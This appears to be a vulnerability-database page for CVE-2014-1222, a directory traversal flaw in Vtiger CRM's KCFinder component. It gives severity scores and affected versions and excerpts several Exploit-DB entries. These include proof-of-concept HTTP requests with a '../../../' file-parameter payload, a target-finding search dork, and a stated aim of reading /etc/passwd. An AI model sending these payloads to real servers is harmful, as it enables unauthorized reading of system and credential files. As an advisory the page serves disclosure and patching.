CVE-2014-1222
published 2014-08-12CVE-2014-1222: Directory traversal vulnerability in kcfinder/browse.php in Vtiger CRM before 6.0.0 Security patch 1 allows remote authenticated users to read arbitrary files…
PriorityP431medium4CVSS 2.0
AVNACLAuSCPINAN
EXPLOIT
EPSS
8.79%
94.5th percentile
Directory traversal vulnerability in kcfinder/browse.php in Vtiger CRM before 6.0.0 Security patch 1 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter in a download action. NOTE: it is likely that this issue is actually in the KCFinder third-party component, and it affects additional products besides Vtiger CRM.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vtiger | vtiger_crm | <= 6.0.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
exploitdb·2015-03-31·CVSS 7.5
CVE-2014-9148 [HIGH] Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
---
# Exploit Title: FiyoCMS Multiple Vulnerabilities
# Date: 29 March 2015
# Exploit Author: Mahendra
# Vendor Homepage: www.fiyo.org
# Software Link: http://sourceforge.net/projects/fiyo-cms/
# Version: 2.0.1.8, other version might be vulnerable.
# Tested : Kali Linux 1.0.9a-amd64
# CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148
*Advisory Timeline*
30-11-2014: Vendor notified and responded back
01-12-2014: Vulnerabilities provided to vendor
03-14-2015: Vendor released newer version claimed to fix the vulnerabilities
29-03-2015: Advisory released
FiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass
*Advisory details*
Several security issues have been identified on the latest FiyoCMS platform.
*Proof of Concept (PoC)*
Mu
Exploit-DB
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion
exploitdb·2014-03-12·CVSS 4.0
CVE-2014-1222 [MEDIUM] vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion
---
CVE: CVE-2014-1222
Vendor: Vtiger
Product: CRM
Affected version: Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version: Vtiger 6.0.0 Security patch 1
Reported by: Jerzy Kramarz
Details:
A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.
The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,applicatio
Exploit-DB
KCFinder 2.51 - Local File Disclosure
exploitdb·2013-08-15
CVE-2014-1222 KCFinder 2.51 - Local File Disclosure
KCFinder 2.51 - Local File Disclosure
---
# Exploit Title: KCFinder Local File Disclosure
# Author: DaOne
# Vendor Homepage: http://kcfinder.sunhater.com/
# Category: webapps/php
# Version: 2.51 + old versions
# Google dork: inurl:kcfinder/browse.php
[#] Tested on their own demo...
-PoC-
POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
Host: server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
dir=images/Photos+from+Bulgaria&file=../../../index.php
No writeups or analysis indexed.
http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%206.0.0/Add-ons/vtigercrm-600-security-patch1.zip/downloadhttp://www.securityfocus.com/archive/1/531423/100/0/threadedhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1222/http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%206.0.0/Add-ons/vtigercrm-600-security-patch1.zip/downloadhttp://www.securityfocus.com/archive/1/531423/100/0/threadedhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1222/
2014-08-12
Published